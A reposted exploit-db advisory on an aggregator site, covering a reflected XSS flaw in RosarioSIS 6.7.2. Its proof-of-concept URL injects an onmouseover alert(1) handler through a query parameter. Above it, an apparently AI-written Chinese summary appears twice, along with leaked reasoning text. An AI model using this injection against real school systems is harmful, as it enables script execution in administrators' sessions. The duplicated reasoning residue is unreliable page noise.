[webapps] RosarioSIS 6.7.2 - Cross-Site Scripting (XSS)
嗯,用户让我总结一篇文章的内容,控制在一百个字以内,而且不需要特定的开头。首先,我需要仔细阅读文章内容。 文章标题是RosarioSIS 6.7.2的XSS漏洞。日期是2025年11月25日,作者是CodeSecLab。软件链接和版本信息也提供了。测试环境是Windows,CVE编号是CVE-2020-15718。 然后看POC部分,链接中包含了一个onmouseover事件,弹出alert(1)。步骤是登录管理员账户,发送请求,观察结果。 总结时要包括软件名称、漏洞类型、影响版本、利用方式以及触发条件。要简洁明了,控制在一百字以内。 所以最终的总结应该是:RosarioSIS 6.7.2版本存在跨站脚本(XSS)漏洞。攻击者可通过构造特定请求,在用户鼠标悬停时触发恶意脚本执行。 </think> RosarioSIS 6.7.2版本存在跨站脚本(XSS)漏洞。攻击者可通过构造特定请求,在用户鼠标悬停时触发恶意脚本执行。 2025-12-3 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:6 收藏
嗯,用户让我总结一篇文章的内容,控制在一百个字以内,而且不需要特定的开头。首先,我需要仔细阅读文章内容。 文章标题是RosarioSIS 6.7.2的XSS漏洞。日期是2025年11月25日,作者是CodeSecLab。软件链接和版本信息也提供了。测试环境是Windows,CVE编号是CVE-2020-15718。 然后看POC部分,链接中包含了一个onmouseover事件,弹出alert(1)。步骤是登录管理员账户,发送请求,观察结果。 总结时要包括软件名称、漏洞类型、影响版本、利用方式以及触发条件。要简洁明了,控制在一百字以内。 所以最终的总结应该是:RosarioSIS 6.7.2版本存在跨站脚本(XSS)漏洞。攻击者可通过构造特定请求,在用户鼠标悬停时触发恶意脚本执行。 </think> RosarioSIS 6.7.2版本存在跨站脚本(XSS)漏洞。攻击者可通过构造特定请求,在用户鼠标悬停时触发恶意脚本执行。 2025-12-3 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:6 收藏
# Exploit Title: RosarioSIS 6.7.2 - Cross-Site Scripting (XSS)
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://gitlab.com/francoisjacquet/rosariosis
# Software Link: https://gitlab.com/francoisjacquet/rosariosis
# Version: 6.7.2
# Tested on: Windows
# CVE : CVE-2020-15718
Proof Of Concept
http://rosariosis/Modules.php?modname=Scheduling/PrintSchedules.php&search_modfunc=list&include_inactive=" onmouseover="alert(1)"
Steps to Reproduce
Log in as an admin user.
Send the request.
Observe the result.
文章来源: https://www.exploit-db.com/exploits/52449
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh